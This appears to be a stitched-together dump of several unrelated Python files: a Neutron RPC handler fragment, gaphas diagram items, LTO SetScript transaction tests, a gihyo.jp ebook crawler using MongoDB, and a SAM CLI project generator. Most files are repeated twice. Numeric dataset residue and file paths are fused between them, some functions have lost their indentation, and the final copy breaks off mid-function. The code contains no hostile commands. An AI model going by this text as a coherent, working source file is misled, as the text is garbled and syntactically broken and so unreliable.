        Looks for port_update, network_delete, etc. and calls them with
        the payloads the handlers are expecting (an ID).
        """
        rtype = rtype.lower()  # all legacy handlers don't camelcase
        method, host_with_activation, host_with_deactivation = (
            self._get_method_host(rtype, event, **kwargs))
        if not hasattr(self._legacy_interface, method):
            # TODO(kevinbenton): once these notifications are stable, emit
            # a deprecation warning for legacy handlers
            return
        # If there is a binding deactivation, we must also notify the
        # corresponding activation
        if method == BINDING_DEACTIVATE:
            self._legacy_interface.binding_deactivate(
                context, port_id=resource_id, host=host_with_deactivation)
            self._legacy_interface.binding_activate(
                context, port_id=resource_id, host=host_with_activation)
        else:
            # e.g. {'port': {'id': ...}, 'port_id': ...} for a port event.
            payload = {rtype: {'id': resource_id},
                       '%s_id' % rtype: resource_id}
            getattr(self._legacy_interface, method)(context, **payload)

    def _get_method_host(self, rtype, event, **kwargs):
        """Constructs the name of method to be called in the legacy interface.

        If the event received is a port update that contains a binding
        activation where a previous binding is deactivated, the method name
        is 'binding_deactivate' and the host where the binding has to be
        deactivated is returned. Otherwise, the method name is constructed
        from rtype and the event received and the host is None.
        """
        is_delete = event == callback_events.AFTER_DELETE
        suffix = 'delete' if is_delete else 'update'
        method = "%s_%s" % (rtype, suffix)
        host_with_activation = None
        host_with_deactivation = None
        # Only port updates can carry a binding activation.
        if is_delete or rtype != callback_resources.PORT:
            return method, host_with_activation, host_with_deactivation
        # A port update was received. Find out if it is a binding activation
        # where a previous binding was deactivated
        BINDINGS = pb_ext.COLLECTION_NAME
        if BINDINGS in kwargs.get('changed_fields', set()):
            existing_active_binding = (
                utils.get_port_binding_by_status_and_host(
                    getattr(kwargs['existing'], 'bindings', []),
                    constants.ACTIVE))
            updated_active_binding = (
                utils.get_port_binding_by_status_and_host(
                    getattr(kwargs['updated'], 'bindings', []),
                    constants.ACTIVE))
            # The ACTIVE binding moved hosts and the old host still has an
            # INACTIVE binding: report it as a deactivation.
            if (existing_active_binding and updated_active_binding and
                    existing_active_binding.host !=
                    updated_active_binding.host):
                if (utils.get_port_binding_by_status_and_host(
                        getattr(kwargs['updated'], 'bindings', []),
                        constants.INACTIVE,
                        host=existing_active_binding.host)):
                    method = BINDING_DEACTIVATE
                    host_with_activation = updated_active_binding.host
                    host_with_deactivation = existing_active_binding.host
        return method, host_with_activation, host_with_deactivation

    def get_devices_details_list_and_failed_devices(self, context, devices,
                                                    agent_id, host=None):
        """Resolve each device's details, collecting per-device failures.

        Failures here come from local cache lookups, not the server.
        """
        result = {'devices': [], 'failed_devices': []}
        for device in devices:
            try:
                result['devices'].append(
                    self.get_device_details(context, device, agent_id, host))
            except Exception:
                LOG.exception("Failed to get details for device %s", device)
                result['failed_devices'].append(device)
        return result

    def get_device_details(self, context, device, agent_id, host=None):
        """Build the device-details dict for *device* from the local cache.

        Returns a minimal {'device': ...} dict when the port is unknown,
        unbound, or has no bound segment; flags NO_ACTIVE_BINDING when a
        compute-owned port's ACTIVE binding lives on a different host.
        """
        port_obj = self.remote_resource_cache.get_resource_by_id(
            resources.PORT, device)
        if not port_obj:
            LOG.debug("Device %s does not exist in cache.", device)
            return {'device': device}
        if not port_obj.binding_levels:
            LOG.warning("Device %s is not bound.", port_obj)
            return {'device': device}
        # The segment is taken from the last binding level.
        segment = port_obj.binding_levels[-1].segment
        if not segment:
            LOG.debug("Device %s is not bound to any segment.", port_obj)
            return {'device': device}
        binding = utils.get_port_binding_by_status_and_host(
            port_obj.bindings, constants.ACTIVE, raise_if_not_found=True,
            port_id=port_obj.id)
        # Compute-owned ports are only answered when the ACTIVE binding is
        # on this agent's host.
        if (port_obj.device_owner.startswith(
                constants.DEVICE_OWNER_COMPUTE_PREFIX) and
                binding[pb_ext.HOST] != host):
            LOG.debug("Device %s has no active binding in this host",
                      port_obj)
            return {'device': device,
                    constants.NO_ACTIVE_BINDING: True}
        net = self.remote_resource_cache.get_resource_by_id(
            resources.NETWORK, port_obj.network_id)
        net_qos_policy_id = net.qos_policy_id
        # match format of old RPC interface
        mac_addr = str(netaddr.EUI(str(port_obj.mac_address),
                                   dialect=netaddr.mac_unix_expanded))
        entry = {
            'device': device,
            'network_id': port_obj.network_id,
            'port_id': port_obj.id,
            'mac_address': mac_addr,
            'admin_state_up': port_obj.admin_state_up,
            'network_type': segment.network_type,
            'segmentation_id': segment.segmentation_id,
            'physical_network': segment.physical_network,
            'fixed_ips': [{'subnet_id': o.subnet_id,
                           'ip_address': str(o.ip_address)}
                          for o in port_obj.fixed_ips],
            'device_owner': port_obj.device_owner,
            'allowed_address_pairs': [{'mac_address': o.mac_address,
                                       'ip_address': o.ip_address}
                                      for o in port_obj.allowed_address_pairs],
            # Ports without security info default to port security enabled.
            'port_security_enabled': getattr(port_obj.security,
                                             'port_security_enabled', True),
            'qos_policy_id': port_obj.qos_policy_id,
            'network_qos_policy_id': net_qos_policy_id,
            'profile': binding.profile,
            'security_groups': list(port_obj.security_group_ids)
        }
        LOG.debug("Returning: %s", entry)
        return entry
def get_devices_details_list(self, context, devices, agent_id, host=None):
return [self.get_device_details(context, device, agent_id, host)
for device in devices] | 0.782164 | 0.097519 |
import ast
from typing import Optional
from gaphas.canvas import Canvas
from gaphas.item import NW, Element
from gaphas.item import Line as _Line
from gaphas.util import path_ellipse
class SimpleItem:
    """
    Marker for simple (non-Presentation) diagram items.

    Provides no-op save/load protocol hooks plus unlink(), so subclasses
    only override what they need.
    """

    # Canvas the item lives on; falsy when not placed on one.
    canvas: Optional[Canvas]

    def save(self, save_func):
        # Persistence hook; subclasses emit their properties here.
        ...

    def load(self, name, value):
        # Persistence hook; subclasses restore one named property here.
        ...

    def postload(self):
        # Called after loading; subclasses finish restoring state here.
        ...

    def unlink(self):
        """
        Remove the item from the canvas.
        """
        if self.canvas:
            self.canvas.remove(self)
class Line(_Line, SimpleItem):
    """A free-form polyline diagram item with save/load support."""

    def __init__(self, id=None, model=None):
        super().__init__()
        # Style lookup: a callable mapping a style name to its value.
        self.style = {"line-width": 2, "color": (0, 0, 0, 1)}.__getitem__
        self._id = id
        # Pick tolerance around the line (units per gaphas -- TODO confirm).
        self.fuzziness = 2
        # End handles can be moved but not connected to other items.
        self._handles[0].connectable = False
        self._handles[-1].connectable = False

    id = property(lambda self: self._id, doc="Id")

    def save(self, save_func):
        """Persist matrix, orthogonal/horizontal flags and handle points."""
        save_func("matrix", tuple(self.matrix))
        for prop in ("orthogonal", "horizontal"):
            save_func(prop, getattr(self, prop))
        points = [tuple(map(float, h.pos)) for h in self.handles()]
        save_func("points", points)

    def load(self, name, value):
        """Restore one saved property (values arrive as repr strings)."""
        if name == "matrix":
            self.matrix = ast.literal_eval(value)
        elif name == "points":
            points = ast.literal_eval(value)
            # Insert extra handles so the count matches the saved points
            # (assumes a fresh line starts with two handles -- per the
            # first/last handle setup in __init__).
            for x in range(len(points) - 2):
                h = self._create_handle((0, 0))
                self._handles.insert(1, h)
            for i, p in enumerate(points):
                self.handles()[i].pos = p
            self._update_ports()
        elif name == "horizontal":
            self.horizontal = ast.literal_eval(value)
        elif name == "orthogonal":
            # Deferred to postload() -- presumably orthogonality needs the
            # complete handle set first; confirm against gaphas.
            self._load_orthogonal = ast.literal_eval(value)

    def postload(self):
        # Apply the orthogonal flag that load() deferred.
        if hasattr(self, "_load_orthogonal"):
            self.orthogonal = self._load_orthogonal
            del self._load_orthogonal

    def draw(self, context):
        """Draw the line with the configured width and color."""
        cr = context.cairo
        style = self.style
        cr.set_line_width(style("line-width"))
        cr.set_source_rgba(*style("color"))
        super().draw(context)
class Box(Element, SimpleItem):
    """
    A rectangular diagram item with four corner handles::

        NW +---+ NE
        SW +---+ SE
    """

    def __init__(self, id=None, model=None):
        super().__init__(10, 10)
        self.style = {"line-width": 2, "color": (0, 0, 0, 1)}.__getitem__
        self._id = id

    id = property(lambda self: self._id, doc="Id")

    def save(self, save_func):
        """Persist the transformation matrix and the box dimensions."""
        for name, value in (("matrix", tuple(self.matrix)),
                            ("width", self.width),
                            ("height", self.height)):
            save_func(name, value)

    def load(self, name, value):
        """Restore one property from its saved repr string."""
        if name in ("matrix", "width", "height"):
            setattr(self, name, ast.literal_eval(value))

    def postload(self):
        pass

    def draw(self, context):
        """Stroke the box outline with the configured width and color."""
        cr = context.cairo
        origin = self._handles[NW].pos
        cr.rectangle(origin.x, origin.y, self.width, self.height)
        cr.set_source_rgba(*self.style("color"))
        cr.set_line_width(self.style("line-width"))
        cr.stroke()
class Ellipse(Element, SimpleItem):
    """
    An elliptical diagram item inscribed in the element's bounding box.

    Fixes: filled in the previously empty class docstring, and removed
    dataset-extraction junk that was fused onto the final line of draw()
    and broke the syntax.
    """

    def __init__(self, id=None, model=None):
        super().__init__()
        # Style lookup: a callable mapping a style name to its value.
        self.style = {"line-width": 2, "color": (0, 0, 0, 1)}.__getitem__
        self._id = id

    id = property(lambda self: self._id, doc="Id")

    def save(self, save_func):
        """Persist the transformation matrix and the ellipse dimensions."""
        save_func("matrix", tuple(self.matrix))
        save_func("width", self.width)
        save_func("height", self.height)

    def load(self, name, value):
        """Restore one property from its saved repr string."""
        if name == "matrix":
            self.matrix = ast.literal_eval(value)
        elif name == "width":
            self.width = ast.literal_eval(value)
        elif name == "height":
            self.height = ast.literal_eval(value)

    def postload(self):
        pass

    def draw(self, context):
        """Stroke the ellipse outline with the configured width and color."""
        cr = context.cairo
        style = self.style
        rx = self.width / 2.0
        ry = self.height / 2.0
        # Center of the ellipse is (rx, ry) in item coordinates.
        cr.move_to(self.width, ry)
        path_ellipse(cr, rx, ry, self.width, self.height)
        cr.set_source_rgba(*style("color"))
        cr.set_line_width(style("line-width"))
        cr.stroke()
from typing import Optional
from gaphas.canvas import Canvas
from gaphas.item import NW, Element
from gaphas.item import Line as _Line
from gaphas.util import path_ellipse
class SimpleItem:
    """
    Marker for simple (non-Presentation) diagram items.

    Defines the persistence protocol (save/load/postload) as no-ops and a
    shared unlink() that detaches the item from its canvas.
    """

    # The canvas this item belongs to; falsy when detached.
    canvas: Optional[Canvas]

    def save(self, save_func):
        # Overridden by subclasses to emit their persisted properties.
        ...

    def load(self, name, value):
        # Overridden by subclasses to restore one persisted property.
        ...

    def postload(self):
        # Overridden by subclasses for work after all load() calls.
        ...

    def unlink(self):
        """
        Remove the item from the canvas.
        """
        if self.canvas:
            self.canvas.remove(self)
class Line(_Line, SimpleItem):
    """Polyline diagram item with persistence via save()/load()."""

    def __init__(self, id=None, model=None):
        super().__init__()
        # Callable style lookup (name -> value).
        self.style = {"line-width": 2, "color": (0, 0, 0, 1)}.__getitem__
        self._id = id
        # Tolerance for hitting the line with the pointer.
        self.fuzziness = 2
        # First and last handles stay movable but non-connectable.
        self._handles[0].connectable = False
        self._handles[-1].connectable = False

    id = property(lambda self: self._id, doc="Id")

    def save(self, save_func):
        """Emit matrix, flags and the float positions of all handles."""
        save_func("matrix", tuple(self.matrix))
        for prop in ("orthogonal", "horizontal"):
            save_func(prop, getattr(self, prop))
        points = [tuple(map(float, h.pos)) for h in self.handles()]
        save_func("points", points)

    def load(self, name, value):
        """Restore one property; values are parsed with ast.literal_eval."""
        if name == "matrix":
            self.matrix = ast.literal_eval(value)
        elif name == "points":
            points = ast.literal_eval(value)
            # Grow the handle list to match the saved point count
            # (assumes two initial handles -- TODO confirm with gaphas).
            for x in range(len(points) - 2):
                h = self._create_handle((0, 0))
                self._handles.insert(1, h)
            for i, p in enumerate(points):
                self.handles()[i].pos = p
            self._update_ports()
        elif name == "horizontal":
            self.horizontal = ast.literal_eval(value)
        elif name == "orthogonal":
            # Stored and applied later in postload().
            self._load_orthogonal = ast.literal_eval(value)

    def postload(self):
        # Apply the deferred orthogonal flag, if one was loaded.
        if hasattr(self, "_load_orthogonal"):
            self.orthogonal = self._load_orthogonal
            del self._load_orthogonal

    def draw(self, context):
        """Render the line using the configured style."""
        cr = context.cairo
        style = self.style
        cr.set_line_width(style("line-width"))
        cr.set_source_rgba(*style("color"))
        super().draw(context)
class Box(Element, SimpleItem):
    """
    A rectangle item with a handle at each corner::

        NW +---+ NE
        SW +---+ SE
    """

    def __init__(self, id=None, model=None):
        super().__init__(10, 10)
        self.style = {"line-width": 2, "color": (0, 0, 0, 1)}.__getitem__
        self._id = id

    id = property(lambda self: self._id, doc="Id")

    def save(self, save_func):
        """Emit the matrix and the box dimensions."""
        for prop_name, prop_value in (("matrix", tuple(self.matrix)),
                                      ("width", self.width),
                                      ("height", self.height)):
            save_func(prop_name, prop_value)

    def load(self, name, value):
        """Restore matrix/width/height from their repr strings."""
        if name in ("matrix", "width", "height"):
            setattr(self, name, ast.literal_eval(value))

    def postload(self):
        pass

    def draw(self, context):
        """Outline the rectangle using the configured style."""
        cr = context.cairo
        top_left = self._handles[NW].pos
        cr.rectangle(top_left.x, top_left.y, self.width, self.height)
        cr.set_source_rgba(*self.style("color"))
        cr.set_line_width(self.style("line-width"))
        cr.stroke()
class Ellipse(Element, SimpleItem):
    """
    An ellipse item inscribed in the element's bounding box.

    Fixes: filled in the previously empty class docstring, and removed
    dataset-extraction junk (` | 0.807574 | 0.292772 |`) fused onto the
    final line of draw(), which broke the syntax.
    """

    def __init__(self, id=None, model=None):
        super().__init__()
        # Callable style lookup (name -> value).
        self.style = {"line-width": 2, "color": (0, 0, 0, 1)}.__getitem__
        self._id = id

    id = property(lambda self: self._id, doc="Id")

    def save(self, save_func):
        """Emit the matrix and the ellipse dimensions."""
        save_func("matrix", tuple(self.matrix))
        save_func("width", self.width)
        save_func("height", self.height)

    def load(self, name, value):
        """Restore matrix/width/height from their repr strings."""
        if name == "matrix":
            self.matrix = ast.literal_eval(value)
        elif name == "width":
            self.width = ast.literal_eval(value)
        elif name == "height":
            self.height = ast.literal_eval(value)

    def postload(self):
        pass

    def draw(self, context):
        """Outline the ellipse using the configured style."""
        cr = context.cairo
        style = self.style
        rx = self.width / 2.0
        ry = self.height / 2.0
        # (rx, ry) is the ellipse center in item coordinates.
        cr.move_to(self.width, ry)
        path_ellipse(cr, rx, ry, self.width, self.height)
        cr.set_source_rgba(*style("color"))
        cr.set_line_width(style("line-width"))
        cr.stroke()
from LTO.Transactions.SetScript import SetScript
from LTO.Accounts.AccountFactoryED25519 import AccountED25519 as AccountFactory
from time import time
from unittest import mock
class TestSetScript:
    """Unit tests for the SetScript transaction (type 13)."""

    # Fixed seed so the derived test account is deterministic across runs.
    ACCOUNT_SEED = "df3dd6d884714288a39af0bd973a1771c9f00f168cf040d6abb6a50dd5e055d8"
    account = AccountFactory('T').createFromSeed(ACCOUNT_SEED)

    def testConstruct(self):
        """Constructor stores the script and applies the default fee."""
        transaction = SetScript(b'aGVsbG8=')
        assert transaction.script == b'aGVsbG8='
        assert transaction.txFee == 500000000

    def testSignWith(self):
        """Signing fills in timestamp, sender data and a verifiable proof."""
        transaction = SetScript(b'aGVsbG8=')
        assert transaction.isSigned() is False
        transaction.signWith(self.account)
        assert transaction.isSigned() is True
        timestamp = int(time() * 1000)
        # Milliseconds are dropped to keep the comparison stable.
        assert str(transaction.timestamp)[:-3] == str(timestamp)[:-3]
        # NOTE(review): '<KEY>' looks like a scrubbed fixture placeholder;
        # the real expected address/key must be restored for this to pass.
        assert transaction.sender == '<KEY>'
        assert transaction.senderPublicKey == '<KEY>'
        assert self.account.verifySignature(transaction.toBinary(), transaction.proofs[0])

    def expectedV1(self):
        # Expected JSON payload for a version-1 transaction.
        return {
            "type": 13,
            "version": 1,
            "sender": '<KEY>',
            "senderPublicKey": '<KEY>',
            "fee": 500000000,
            "timestamp": 1609773456000,
            "script": 'base64:' + str(b'aGVsbG8='),
            "proofs": ['Z5dX5Upqq8ergHPhi4J2qLTroLKzUUdf3yR36Ns9oiASs6nWKdDHacD4W2WzweQczJaUCogrBZ6xMhMi1vKMXky']
        }

    def expectedV3(self):
        # Expected JSON payload for a version-3 transaction.
        return {
            "type": 13,
            "version": 3,
            "sender": '3MtHYnCkd3oFZr21yb2vEdngcSG<KEY>',
            "senderKeyType": "ed25519",
            "senderPublicKey": '<KEY>',
            "fee": 500000000,
            "timestamp": 1609773456000,
            "script": 'base64:' + str(b'aGVsbG8='),
            "proofs": ['<KEY>']
        }

    def testToJson(self):
        """toJson() matches the expected payload for the built version."""
        transaction = SetScript(b'aGVsbG8=')
        transaction.timestamp = 1609773456000
        transaction.signWith(self.account)
        if transaction.version == 1:
            expected = self.expectedV1()
        elif transaction.version == 3:
            expected = self.expectedV3()
        else:
            expected = ''
        assert transaction.toJson() == expected

    @mock.patch('src.LTO.PublicNode')
    def testBroadcast(self, mock_Class):
        """A (mocked) node broadcast returns the transaction with its id."""
        transaction = SetScript(b'aGVsbG8=')
        broadcastedTransaction = SetScript(b'aGVsbG8=')
        broadcastedTransaction.id = '7cCeL1qwd9i6u8NgMNsQjBPxVhrME2BbfZMT1DF9p4Yi'
        mc = mock_Class.return_value
        mc.broadcast.return_value = broadcastedTransaction
        assert mc.broadcast(transaction) == broadcastedTransaction
def testFromData(self):
data = {
"type": 13,
"version": 1,
"id": 'BG7MQF8KffVU6MMbJW5xPowVQsohwJhfEJ4wSF8cWdC2',
"sender": '3MtHYnCkd3oFZr21yb2vEdngcSGXvuNNCq2',
"senderKeyType": "ed25519",
"senderPublicKey": '<KEY>',
"fee": 500000000,
"timestamp": 1609773456000,
"script": b'aGVsbG8=',
"proofs": ['<KEY>']
}
transaction = SetScript(data['script']).fromData(data)
for key in data:
assert data[key] == transaction.__getattr__(key) | tests/Transactions/SetScriptTest.py | from LTO.Transactions.SetScript import SetScript
from LTO.Accounts.AccountFactoryED25519 import AccountED25519 as AccountFactory
from time import time
from unittest import mock
class TestSetScript:
    """Tests covering construction, signing, JSON output and broadcast of
    the SetScript transaction (type 13)."""

    # Deterministic seed: the derived account is identical on every run.
    ACCOUNT_SEED = "df3dd6d884714288a39af0bd973a1771c9f00f168cf040d6abb6a50dd5e055d8"
    account = AccountFactory('T').createFromSeed(ACCOUNT_SEED)

    def testConstruct(self):
        """Script bytes and the default fee are stored on construction."""
        transaction = SetScript(b'aGVsbG8=')
        assert transaction.script == b'aGVsbG8='
        assert transaction.txFee == 500000000

    def testSignWith(self):
        """signWith() sets timestamp, sender fields and a valid proof."""
        transaction = SetScript(b'aGVsbG8=')
        assert transaction.isSigned() is False
        transaction.signWith(self.account)
        assert transaction.isSigned() is True
        timestamp = int(time() * 1000)
        # Compare without the millisecond digits to avoid flakiness.
        assert str(transaction.timestamp)[:-3] == str(timestamp)[:-3]
        # NOTE(review): '<KEY>' placeholders appear scrubbed; restore the
        # real expected values before relying on these assertions.
        assert transaction.sender == '<KEY>'
        assert transaction.senderPublicKey == '<KEY>'
        assert self.account.verifySignature(transaction.toBinary(), transaction.proofs[0])

    def expectedV1(self):
        # JSON expected for a version-1 transaction.
        return {
            "type": 13,
            "version": 1,
            "sender": '<KEY>',
            "senderPublicKey": '<KEY>',
            "fee": 500000000,
            "timestamp": 1609773456000,
            "script": 'base64:' + str(b'aGVsbG8='),
            "proofs": ['Z5dX5Upqq8ergHPhi4J2qLTroLKzUUdf3yR36Ns9oiASs6nWKdDHacD4W2WzweQczJaUCogrBZ6xMhMi1vKMXky']
        }

    def expectedV3(self):
        # JSON expected for a version-3 transaction.
        return {
            "type": 13,
            "version": 3,
            "sender": '3MtHYnCkd3oFZr21yb2vEdngcSG<KEY>',
            "senderKeyType": "ed25519",
            "senderPublicKey": '<KEY>',
            "fee": 500000000,
            "timestamp": 1609773456000,
            "script": 'base64:' + str(b'aGVsbG8='),
            "proofs": ['<KEY>']
        }

    def testToJson(self):
        """toJson() output matches the version-appropriate expectation."""
        transaction = SetScript(b'aGVsbG8=')
        transaction.timestamp = 1609773456000
        transaction.signWith(self.account)
        if transaction.version == 1:
            expected = self.expectedV1()
        elif transaction.version == 3:
            expected = self.expectedV3()
        else:
            expected = ''
        assert transaction.toJson() == expected

    @mock.patch('src.LTO.PublicNode')
    def testBroadcast(self, mock_Class):
        """Broadcasting through a mocked node yields the tx with an id."""
        transaction = SetScript(b'aGVsbG8=')
        broadcastedTransaction = SetScript(b'aGVsbG8=')
        broadcastedTransaction.id = '7cCeL1qwd9i6u8NgMNsQjBPxVhrME2BbfZMT1DF9p4Yi'
        mc = mock_Class.return_value
        mc.broadcast.return_value = broadcastedTransaction
        assert mc.broadcast(transaction) == broadcastedTransaction
def testFromData(self):
data = {
"type": 13,
"version": 1,
"id": 'BG7MQF8KffVU6MMbJW5xPowVQsohwJhfEJ4wSF8cWdC2',
"sender": '3MtHYnCkd3oFZr21yb2vEdngcSGXvuNNCq2',
"senderKeyType": "ed25519",
"senderPublicKey": '<KEY>',
"fee": 500000000,
"timestamp": 1609773456000,
"script": b'aGVsbG8=',
"proofs": ['<KEY>']
}
transaction = SetScript(data['script']).fromData(data)
for key in data:
assert data[key] == transaction.__getattr__(key) | 0.572245 | 0.437403 |
# 実行方法
# python python_crawler_final_bs4.py
import re
import time
from typing import Iterator
import requests
from pymongo import MongoClient
from urllib.parse import urljoin
from bs4 import BeautifulSoup
def main():
    """
    Main crawler routine: collect ebook detail pages into MongoDB,
    skipping pages that were already stored.
    """
    client = MongoClient('localhost', 27017)  # Connect to MongoDB on localhost.
    collection = client.scraping.ebooks  # The ebooks collection of the scraping DB.
    # Unique index on 'key', the field that uniquely identifies a record.
    collection.create_index('key', unique=True)
    session = requests.Session()
    response = session.get('https://gihyo.jp/dp')  # Fetch the list page.
    urls = scrape_list_page(response)  # URLs of the detail pages.
    for url in urls:
        key = extract_key(url)  # Derive the key from the URL.
        ebook = collection.find_one({'key': key})  # Look the key up in MongoDB.
        if not ebook:  # Crawl the detail page only when not stored yet.
            time.sleep(1)  # Be polite: pause between requests.
            response = session.get(url)  # Fetch the detail page.
            ebook = scrape_detail_page(response)
            collection.insert_one(ebook)  # Save the ebook data to MongoDB.
        print(ebook)  # Show the ebook data.
def scrape_list_page(response: requests.Response) -> Iterator[str]:
    """
    Generator yielding absolute detail-page URLs found in a list-page response.
    """
    document = BeautifulSoup(response.text, 'html.parser')
    anchors = document.select('#listBook > li > a[itemprop="url"]')
    for anchor in anchors:
        # Resolve the (possibly relative) href against the page URL.
        yield urljoin(response.url, anchor.get('href'))
def scrape_detail_page(response: requests.Response) -> dict:
    """
    Extract the ebook information from a detail-page response as a dict.
    """
    document = BeautifulSoup(response.text, 'html.parser')
    # Table of contents: every h3 under #content, with whitespace normalized.
    toc = [normalize_spaces(heading.text)
           for heading in document.select('#content > h3')]
    return {
        'url': response.url,
        'key': extract_key(response.url),  # key derived from the URL
        'title': document.select_one('#bookTitle').text,
        # First child node of .buy holds the price text; trim surrounding space.
        'price': document.select_one('.buy').contents[0].strip(),
        'content': toc,
    }
def extract_key(url: str) -> str:
    """
    Return the key (the ISBN at the end of *url*).
    """
    # Capture the non-slash run that ends the URL, i.e. everything
    # after the final '/'.
    return re.search(r'/([^/]+)$', url).group(1)
def normalize_spaces(s: str) -> str:
    """
    Collapse whitespace runs to single spaces and trim both ends.
    """
    # str.split() with no argument splits on any whitespace run and drops
    # leading/trailing whitespace, so re-joining yields the normalized text.
    return ' '.join(s.split())
if __name__ == '__main__':
    # Fix: stray dataset residue ("| crawling_scraping/...") removed after
    # the call; it made this line a syntax error.
    main()
# Usage:
# python python_crawler_final_bs4.py
import re
import time
from typing import Iterator
import requests
from pymongo import MongoClient
from urllib.parse import urljoin
from bs4 import BeautifulSoup
def main():
    """
    Main crawler routine.

    Crawl the gihyo.jp ebook list page, visit each detail page that is not
    yet stored, and save the scraped ebook data to MongoDB.
    """
    client = MongoClient('localhost', 27017)  # Connect to MongoDB on localhost.
    try:
        collection = client.scraping.ebooks  # ebooks collection in the scraping database.
        # Unique index on the key field that uniquely identifies each document.
        collection.create_index('key', unique=True)
        session = requests.Session()
        response = session.get('https://gihyo.jp/dp')  # Fetch the list page.
        urls = scrape_list_page(response)  # Detail-page URLs from the list page.
        for url in urls:
            key = extract_key(url)  # Derive the lookup key from the URL.
            ebook = collection.find_one({'key': key})  # Already crawled?
            if not ebook:  # Only crawl detail pages not yet in MongoDB.
                time.sleep(1)  # Be polite: throttle requests by one second.
                response = session.get(url)  # Fetch the detail page.
                ebook = scrape_detail_page(response)
                collection.insert_one(ebook)  # Persist the ebook data.
            print(ebook)  # Show the ebook data.
    finally:
        # Fix: release the MongoDB connection; it was previously leaked.
        client.close()
def scrape_list_page(response: requests.Response) -> Iterator[str]:
    """
    Generator yielding absolute detail-page URLs found in a list-page response.
    """
    document = BeautifulSoup(response.text, 'html.parser')
    anchors = document.select('#listBook > li > a[itemprop="url"]')
    for anchor in anchors:
        # Resolve the (possibly relative) href against the page URL.
        yield urljoin(response.url, anchor.get('href'))
def scrape_detail_page(response: requests.Response) -> dict:
    """
    Extract the ebook information from a detail-page response as a dict.
    """
    document = BeautifulSoup(response.text, 'html.parser')
    # Table of contents: every h3 under #content, with whitespace normalized.
    toc = [normalize_spaces(heading.text)
           for heading in document.select('#content > h3')]
    return {
        'url': response.url,
        'key': extract_key(response.url),  # key derived from the URL
        'title': document.select_one('#bookTitle').text,
        # First child node of .buy holds the price text; trim surrounding space.
        'price': document.select_one('.buy').contents[0].strip(),
        'content': toc,
    }
def extract_key(url: str) -> str:
    """
    Return the key (the ISBN at the end of *url*).
    """
    # Capture the non-slash run that ends the URL, i.e. everything
    # after the final '/'.
    return re.search(r'/([^/]+)$', url).group(1)
def normalize_spaces(s: str) -> str:
    """
    Collapse whitespace runs to single spaces and trim both ends.
    """
    # str.split() with no argument splits on any whitespace run and drops
    # leading/trailing whitespace, so re-joining yields the normalized text.
    return ' '.join(s.split())
if __name__ == '__main__':
    # Fix: stray dataset residue ("| 0.41182 | 0.210604") removed after the
    # call; it made this a bitwise-or of floats (TypeError at runtime).
    main()
import itertools
import logging
from cookiecutter.exceptions import CookiecutterException
from cookiecutter.main import cookiecutter
from samcli.local.common.runtime_template import RUNTIME_DEP_TEMPLATE_MAPPING
from samcli.local.init.exceptions import GenerateProjectFailedError
# Module-level logger, named after this module's import path.
LOG = logging.getLogger(__name__)
def generate_project(
    location=None, runtime="nodejs10.x", dependency_manager=None, output_dir=".", name="sam-sample-app", no_input=False
):
    """Generates project using cookiecutter and options given

    Generate project scaffolds a project using default templates if user
    doesn't provide one via location parameter. Default templates are
    automatically chosen depending on runtime given by the user.

    Parameters
    ----------
    location: Path, optional
        Git, HTTP, Local path or Zip containing cookiecutter template
        (the default is None, which means no custom template)
    runtime: str, optional
        Lambda Runtime (the default is "nodejs", which creates a nodejs project)
    dependency_manager: str, optional
        Dependency Manager for the Lambda Runtime Project(the default is "npm" for a "nodejs" Lambda runtime)
    output_dir: str, optional
        Output directory where project should be generated
        (the default is ".", which implies current folder)
    name: str, optional
        Name of the project
        (the default is "sam-sample-app", which implies a project named sam-sample-app will be created)
    no_input : bool, optional
        Whether to prompt for input or to accept default values
        (the default is False, which prompts the user for values it doesn't know for baking)

    Raises
    ------
    GenerateProjectFailedError
        If the process of baking a project fails
    """
    # Pick the first template mapping that supports this runtime (exact or
    # prefix match) and, when one was requested, the dependency manager.
    template = None
    for mapping in itertools.chain.from_iterable(RUNTIME_DEP_TEMPLATE_MAPPING.values()):
        if runtime in mapping["runtimes"] or any(r.startswith(runtime) for r in mapping["runtimes"]):
            if not dependency_manager or dependency_manager == mapping["dependency_manager"]:
                template = mapping["init_location"]
                break
    if not template:
        msg = "Lambda Runtime {} does not support dependency manager: {}".format(runtime, dependency_manager)
        raise GenerateProjectFailedError(project=name, provider_error=msg)

    # A user-supplied template location always wins over the built-in one.
    params = {"template": location if location else template, "output_dir": output_dir, "no_input": no_input}
    LOG.debug("Parameters dict created with input given")
    LOG.debug("%s", params)

    if not location and name is not None:
        # Built-in templates are baked non-interactively with the project
        # name and runtime passed as cookiecutter extra context.
        params["extra_context"] = {"project_name": name, "runtime": runtime}
        params["no_input"] = True
        LOG.debug("Parameters dict updated with project name as extra_context")
        LOG.debug("%s", params)

    try:
        LOG.debug("Baking a new template with cookiecutter with all parameters")
        cookiecutter(**params)
    except CookiecutterException as e:
        # Chain the original cookiecutter failure for easier debugging.
        # Fix: stray dataset residue removed from this line; also use
        # explicit exception chaining and drop the unnecessary list() and
        # list-comprehension inside any() above.
        raise GenerateProjectFailedError(project=name, provider_error=e) from e
import logging
from cookiecutter.exceptions import CookiecutterException
from cookiecutter.main import cookiecutter
from samcli.local.common.runtime_template import RUNTIME_DEP_TEMPLATE_MAPPING
from samcli.local.init.exceptions import GenerateProjectFailedError
# Module-level logger, named after this module's import path.
LOG = logging.getLogger(__name__)
def generate_project(
    location=None, runtime="nodejs10.x", dependency_manager=None, output_dir=".", name="sam-sample-app", no_input=False
):
    """Generates project using cookiecutter and options given

    Generate project scaffolds a project using default templates if user
    doesn't provide one via location parameter. Default templates are
    automatically chosen depending on runtime given by the user.

    Parameters
    ----------
    location: Path, optional
        Git, HTTP, Local path or Zip containing cookiecutter template
        (the default is None, which means no custom template)
    runtime: str, optional
        Lambda Runtime (the default is "nodejs", which creates a nodejs project)
    dependency_manager: str, optional
        Dependency Manager for the Lambda Runtime Project(the default is "npm" for a "nodejs" Lambda runtime)
    output_dir: str, optional
        Output directory where project should be generated
        (the default is ".", which implies current folder)
    name: str, optional
        Name of the project
        (the default is "sam-sample-app", which implies a project named sam-sample-app will be created)
    no_input : bool, optional
        Whether to prompt for input or to accept default values
        (the default is False, which prompts the user for values it doesn't know for baking)

    Raises
    ------
    GenerateProjectFailedError
        If the process of baking a project fails
    """
    # Pick the first template mapping that supports this runtime (exact or
    # prefix match) and, when one was requested, the dependency manager.
    template = None
    for mapping in itertools.chain.from_iterable(RUNTIME_DEP_TEMPLATE_MAPPING.values()):
        if runtime in mapping["runtimes"] or any(r.startswith(runtime) for r in mapping["runtimes"]):
